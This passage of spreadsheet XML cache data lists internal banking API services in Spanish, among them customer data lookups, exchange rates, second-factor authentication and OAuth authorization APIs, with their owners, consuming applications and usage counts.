    <m/>
    <s v="Consulta de Documentos BB1 V2_AW1216001"/>
    <s v="AW1177 _x000d__x000a_AW0922 _x000d__x000a_AW0856 _x000d__x000a_AW1182 _x000d__x000a_AW0611001 _x000d__x000a_AW1128 _x000d__x000a_AW0659"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Filiales"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="se consulta en el HUB de Información los datos respectivos de un tipo y número de identificación para recuperar las filiales de un Cliente."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="HUB"/>
    <s v="AW0718001 _x000d__x000a_AW0227001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Id Cliente"/>
    <n v="300"/>
    <s v="No Aplica"/>
    <s v="Realiza consultas por documentos de identificación y IDs de aplicaciones de clientes para obtener las llaves que se requieran de los datos maestros del HUB de información DMR"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="HUB"/>
    <s v="AW0718001 _x000d__x000a_AW0504001 _x000d__x000a_AW0227001 _x000d__x000a_AW0628001 _x000d__x000a_AW0682001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Producto"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Realizar la consulta de los productos que un cliente tiene como titular"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="HUB"/>
    <s v="APIC _x000d__x000a_AW0718001 _x000d__x000a_AW0227001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Tasa Cambio"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio le proporciona al consumidor el valor de una tasa de cambio dado la moneda origen y destino y la fecha de tasa a consultar."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="HUB"/>
    <s v="AW0718001 _x000d__x000a_AW0227001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-07-07T21:35:05"/>
    <s v="Reference Data Management"/>
    <n v="100"/>
    <s v="Reference Data Management - Master Catalogue"/>
    <n v="100"/>
    <s v="reference-data-management-master-catalogue"/>
    <s v="API que permite consultar los catálogos de valores de los distintos atributos de los datos de información de cliente. Conteniendo la llave-valor de los códigos y descripciones de los maestros del banco para catalogo personas. (Ejemplo: Cargos, Profesiones del cliente, Segmentos, Tipos de documento, entre otros)."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaCatalogoMaestros/V1.0"/>
    <m/>
    <s v="creditlens_NU0038001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ ChannelManagement_D2B_NU0051001 _x000d__x000a_ VisorInteractivo_AW1249001 _x000d__x000a_ ChannelManagement_NU0051001 _x000d__x000a_ Galatea_NU0051001"/>
    <n v="85642"/>
    <n v="105869"/>
    <n v="87381"/>
    <n v="61199"/>
    <n v="53838"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Regenerar Clave SVE"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Permitir generar las claves de los usuarios que interactúan en la Empresa con el producto a través de la Sucursal Virtual, mejorando el servicio cliente en forma segura."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Registrar Sesion Usuario"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="servicio utilizado en el proyecto de transformación digital para la consulta de información de sesión "/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Registro Usuario Validacion Biometrica"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="A través de este servicio se van a registrar en Biovoz los usuarios creados en el Directorio Activo Host to Host para la Unidad Organizativa de Sufi en la cual van a estar matriculados los vendedores de los comercios afiliados y usuarios internos que harán uso de la aplicación ConSufi."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="APP-Sufi_AW1209001"/>
    <s v="TP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-22T02:16:18"/>
    <s v="Regulatory Compliance"/>
    <n v="102"/>
    <s v="Regulatory Compliance - Risk Rating Management SCOVIC"/>
    <n v="102"/>
    <s v="regulatory-compliance-risk-raiting-management-scovic"/>
    <s v="Administra la ejecución de los modelos de riesgos SARLAFT,  busca crear un nuevo componente tecnológico (SCOVIC) que administre las reglas de negocio para entregar los diferentes niveles de calificación para los diferentes modelos de vinculación desde los diferentes canales o aplicaciones."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <m/>
    <s v="SAPCRM_AW0611001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ APM_AW0388001 _x000d__x000a_ ComponenteAdaptadorNequi_NU0163001"/>
    <n v="3620954"/>
    <n v="3153679"/>
    <n v="3111027"/>
    <n v="2976609"/>
    <n v="3103102"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-12-09T16:34:33"/>
    <s v="Sales Product Agreement"/>
    <n v="101"/>
    <s v="Sales Product Agreement - Product Information"/>
    <n v="101"/>
    <s v="sales-product-agreement-product-information"/>
    <s v="La API permite consultar información actual de su plan y consumo de transacciones por medio de sus canales, en la cual se expondrán, los diferentes atributos que conforman la cuenta de ahorros y/o corrientes que tiene activa un cliente con el banco, información como marcación en el GMF, novedades acerca de su cuenta, cupos de sobregiro, los medios de pago asociados a la cuenta, su respectivo valor de la cuota de manejo, descuentos por convenios de nómina, un gestor de finanzas personales, información general y detallada de todos los beneficios del plan, entre otros."/>
    <s v="CLIENTES"/>
    <s v="Ecosistemas Clientes"/>
    <s v="Pricing"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="GESTION DE PRECIOS_NU0091001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="9415030"/>
    <n v="8773075"/>
    <n v="8976006"/>
    <n v="8720360"/>
    <n v="10292915"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-04T11:53:49"/>
    <s v="Sales Product Agreement"/>
    <n v="201"/>
    <s v="Sales Product Agreement - Product Information"/>
    <n v="201"/>
    <s v="sales-product-agreement-product-information"/>
    <s v="Este servicio expone información de los atributos y beneficios relacionados a los productos de Clientes Bancolombia. Atributos como la marcación del GMF, medios de pago asociados a la cuenta, valor de la cuota de manejo y el detalle relacionado con el cobro, particularidades sobre el tipo de plan e información de los beneficios tanto del tipo de cuenta como del plan, por ejemplo, bolsillos sin costo, canales de retiros, transferencias, descuentos por convenios de nómina, un gestor de finanzas personales e información especí­fica de los beneficios del medio de pago."/>
    <s v="CLIENTES"/>
    <s v="Ecosistemas Clientes"/>
    <s v="Pricing"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="GESTION DE PRECIOS_NU0091001"/>
    <n v="9415030"/>
    <n v="8773075"/>
    <n v="8976006"/>
    <n v="8720360"/>
    <n v="10292915"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-13T11:32:21"/>
    <s v="Second Security Factor"/>
    <n v="101"/>
    <s v="Second Security Factor - Information"/>
    <n v="101"/>
    <s v="second-security-factor-information"/>
    <s v="El api Second Security Factor - Information permite realizar la consulta del estado de un cliente en DID con base en su tipo y numero de documento."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ One Click Payment_NU0199001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PreaprobadosSucursales_AW1299001"/>
    <m/>
    <m/>
    <m/>
    <n v="1963"/>
    <n v="21262"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-13T11:32:21"/>
    <s v="Second Security Factor"/>
    <n v="101"/>
    <s v="Second Security Factor - Management"/>
    <n v="101"/>
    <s v="second-security-factor-management"/>
    <s v="El api Second Security Factor - Management permite consumir las funcionalidades para generar un segundo fator ya sea OTP o PUSH, y autenticarlo, que significa confirmar su validez para continuar el proceso."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ One Click Payment_NU0199001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PreaprobadosSucursales_AW1299001"/>
    <n v="198450"/>
    <n v="218783"/>
    <n v="196134"/>
    <n v="216702"/>
    <n v="233026"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-26T14:36:16"/>
    <s v="Security"/>
    <n v="315"/>
    <s v="Security - Authorization Code"/>
    <n v="103"/>
    <s v="security-authorization-code"/>
    <s v="Esta API permite generar un código de autorización con el que posteriormente se puede solicitar un token (sesión) para que los consumidores puedan tranzar en los diferentes aplicativos del banco. Se puede generar usando las credenciales cifradas del cliente, es decir, cuando el Cliente se autentica.  El código de autorización garantiza que un cliente se autenticó de forma exitosa."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="GenerarCodigoAutorizacionPorToken/V1.0_x000a_GestionCodigoAutorizacion/V1.0_x000a_GenerarCodigoAutorizacionPorCredenciales/V1.0"/>
    <m/>
    <s v="PEP_AW1281002 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ SVP_NU0004001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ FUA_AW1291001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ HDC_AW0453001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ Networking_NU0046001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ SVECarteraComercial_NU0162001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Security_AW1291001 _x000d__x000a_ SVN_NU0212001"/>
    <n v="40128175"/>
    <n v="35134289"/>
    <n v="38911106"/>
    <n v="38660405"/>
    <n v="44806196"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-23T23:50:06"/>
    <s v="Security"/>
    <n v="401"/>
    <s v="Security - Authorization Code"/>
    <n v="201"/>
    <s v="security-authorization-code"/>
    <s v="Esta API permite generar un código de autorización con el que posteriormente se puede solicitar un token (sesión) para que los consumidores puedan tranzar en los diferentes aplicativos del banco. Se puede generar usando las credenciales cifradas del cliente, es decir, cuando el Cliente se autentica.  El código de autorización garantiza que un cliente se autenticó de forma exitosa."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ Kioscos_AW1272001 _x000d__x000a_ EDIN_AW1185001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ MigracionFUA_AW1291001 _x000d__x000a_ PortalAutogestionPyme_AW1287 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ SVECarteraComercial_NU0162001 _x000d__x000a_ One Click Payment_NU0199001 _x000d__x000a_ HDC_AW0453001 _x000d__x000a_ Transversal_AW0937001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ SVN_NU0212001 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ SVE_AW0360001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ Marketplacetu360HM_NU0035001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ModuloNegociosFiduciarios_NU0247001"/>
    <n v="40128175"/>
    <n v="35134289"/>
    <n v="38911106"/>
    <n v="38660405"/>
    <n v="44806196"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-06-02T11:12:53"/>
    <s v="Security"/>
    <n v="100"/>
    <s v="Security - Authorization Code"/>
    <n v="100"/>
    <s v="security-authorization-code"/>
    <s v="Esta API permite generar un código de autorización con el que posteriormente se puede solicitar un token (sesión) para que los consumidores puedan tranzar en los diferentes aplicativos del banco. Esta operación es conocida como Single Sing On."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="MarketplaceEcosistemasPersonas_NU0035001"/>
    <n v="40128175"/>
    <n v="35134289"/>
    <n v="38911106"/>
    <n v="38660405"/>
    <n v="44806196"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-26T14:36:16"/>
    <s v="Security"/>
    <n v="315"/>
    <s v="Security - Code Validation"/>
    <n v="311"/>
    <s v="security-code-validation"/>
    <s v="Esta API permite realizar el proceso de autenticación OAuth 2.0 expuesto en WAS, por medio de la verificación de un código de autorización que es previamente generado y posteriormente enviado por el cliente, si el proceso es exitoso genera un access_token con este sistema de autenticación."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="GestionAutenticacionOAuth2/V1.0"/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="PEP_AW1281002 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ SVP_NU0004001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ FUA_AW1291001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ HDC_AW0453001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ Networking_NU0046001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ SVECarteraComercial_NU0162001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Security_AW1291001 _x000d__x000a_ SVN_NU0212001"/>
    <n v="100867"/>
    <n v="142294"/>
    <n v="130189"/>
    <n v="262576"/>
    <n v="806818"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-11T01:01:30"/>
    <s v="Security"/>
    <n v="401"/>
    <s v="Security - Code Validation"/>
    <n v="401"/>
    <s v="security-code-validation"/>
    <s v="Esta API permite realizar el proceso de autenticación OAuth 2.0 expuesto en WAS, por medio de la verificación de un código de autorización que es previamente generado y posteriormente enviado por el cliente, si el proceso es exitoso genera un access_token con este sistema de autenticación."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ Kioscos_AW1272001 _x000d__x000a_ EDIN_AW1185001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ MigracionFUA_AW1291001 _x000d__x000a_ PortalAutogestionPyme_AW1287 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ SVECarteraComercial_NU0162001 _x000d__x000a_ One Click Payment_NU0199001 _x000d__x000a_ HDC_AW0453001 _x000d__x000a_ Transversal_AW0937001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ SVN_NU0212001 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ SVE_AW0360001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ Marketplacetu360HM_NU0035001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ModuloNegociosFiduciarios_NU0247001"/>
    <n v="100867"/>
    <n v="142294"/>
    <n v="130189"/>
    <n v="262576"/>
    <n v="806818"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-06-02T11:12:53"/>
    <s v="Security"/>
    <n v="100"/>
    <s v="Security - Code Validation"/>
    <n v="100"/>
    <s v="security-code-validation"/>
    <s v="Esta API permite realizar el proceso de autenticación OAuth 2.0 expuesto en WAS, por medio de la verificación de un código de autorización que es previamente generado y posteriormente enviado por el cliente, si el proceso es exitoso genera un access_token con este sistema de autenticación."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="MarketplaceEcosistemasPersonas_NU0035001"/>
    <n v="100867"/>
    <n v="142294"/>
    <n v="130189"/>
    <n v="262576"/>
    <n v="806818"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-26T14:36:16"/>
    <s v="Security"/>
    <n v="315"/>
    <s v="Security - Encrypted Key"/>
    <n v="111"/>
    <s v="security-encrypted-key"/>
    <s v="Esta API permite entregar a un consumidor la llave o el módulos para posteriormente con este dato realizar el cifrado del pin del cliente"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="GestionLlaveCifrado/V1.0"/>
    <m/>
    <s v="PEP_AW1281002 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ SVP_NU0004001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ FUA_AW1291001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ HDC_AW0453001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ Networking_NU0046001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ SVECarteraComercial_NU0162001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Security_AW1291001 _x000d__x000a_ SVN_NU0212001"/>
    <n v="1777991"/>
    <n v="1508679"/>
    <n v="449661"/>
    <n v="449064"/>
    <n v="780572"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-08T23:29:06"/>
    <s v="Security"/>
    <n v="401"/>
    <s v="Security - Encrypted Key"/>
    <n v="201"/>
    <s v="security-encrypted-key"/>
    <s v="Esta API permite entregar a un consumidor la llave o el módulos para posteriormente con este dato realizar el cifrado del pin del cliente"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ Kioscos_AW1272001 _x000d__x000a_ EDIN_AW1185001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ MigracionFUA_AW1291001 _x000d__x000a_ PortalAutogestionPyme_AW1287 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ SVECarteraComercial_NU0162001 _x000d__x000a_ One Click Payment_NU0199001 _x000d__x000a_ HDC_AW0453001 _x000d__x000a_ Transversal_AW0937001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ SVN_NU0212001 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ SVE_AW0360001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ Marketplacetu360HM_NU0035001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ModuloNegociosFiduciarios_NU0247001"/>
    <n v="1777991"/>
    <n v="1508679"/>
    <n v="449661"/>
    <n v="449064"/>
    <n v="780572"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-08-18T23:14:28"/>
    <s v="Security"/>
    <n v="114"/>
    <s v="Security - Oauth provider"/>
    <n v="114"/>
    <s v="security-oauth-provider"/>
    <s v="Proveedor de Oauth con flujo de aplicación para autenticación de la aplicación cliente que va a consumir las APIs"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <m/>
    <s v="APP Cayman _x000d__x000a_ Cayman_Soporte _x000d__x000a_ TMP EDIN APP_AW1276001 _x000d__x000a_ TEMP MAM_AW1204 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ TMP2 johucorr_AW1185001 _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ TMP1 johucorr_AW0360010 _x000d__x000a_ APOLO_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-10-18T15:25:09"/>
    <s v="Security"/>
    <n v="202"/>
    <s v="Security - OAuth Provider from OTP"/>
    <n v="201"/>
    <s v="oauth-otp"/>
    <s v="Expone los formularios para validar la identidad y autorización del usuario."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GeneracionToken/V1.0"/>
    <s v="_x000a_PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="WorldRemit_WRT _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ Carventuri _x000d__x000a_ Uniteller_UTL _x000d__x000a_ BCHerramientasMonitoreo_AAA _x000d__x000a_ WOMPI _x000d__x000a_ TIGOUNE _x000d__x000a_ Tuya _x000d__x000a_ VIRGINMOBILEAPP _x000d__x000a_ SmallWorld_OMX _x000d__x000a_ Baguer SAS _x000d__x000a_ SERVICIOS DE SALUD IPS SURAMERICANA S.A.S. _x000d__x000a_ OPERACIONES GENERALES SURAMERICANA SAS _x000d__x000a_ SERVICIOS GENERALES SURAMERICANA S.A.S. _x000d__x000a_ CONSULTORIA EN GESTION DE RIESGOS SURAMERICANA _x000d__x000a_ SEGUROS GENERALES SURAMERICANA SA _x000d__x000a_ SEGUROS DE VIDA SURAMERICANA SA _x000d__x000a_ EPS SURAMERICANA S.A. _x000d__x000a_ FONYOU COLOMBIA SAS _x000d__x000a_ INVERSORA EBCO APP _x000d__x000a_ ABC PAGOS _x000d__x000a_ LYRAAPP _x000d__x000a_ CLAROAPP _x000d__x000a_ SUPERPAGOSAPP _x000d__x000a_ ZONA PAGOS _x000d__x000a_ Place to Pay _x000d__x000a_ T atiendo Boton Bancolombia _x000d__x000a_ Boton Bancolombia _x000d__x000a_ E-collect _x000d__x000a_ App_Blendex_BotonBancolombia _x000d__x000a_ ofrendaappbc _x000d__x000a_ ALKOSTO BOTON BANCOLOMBIA _x000d__x000a_ WOMPI APP _x000d__x000a_ COMFAMA APP _x000d__x000a_ SISTECREDITO SAS _x000d__x000a_ PAYMENTEZ APP _x000d__x000a_ FONVALMED"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-10-22T14:58:44"/>
    <s v="Security"/>
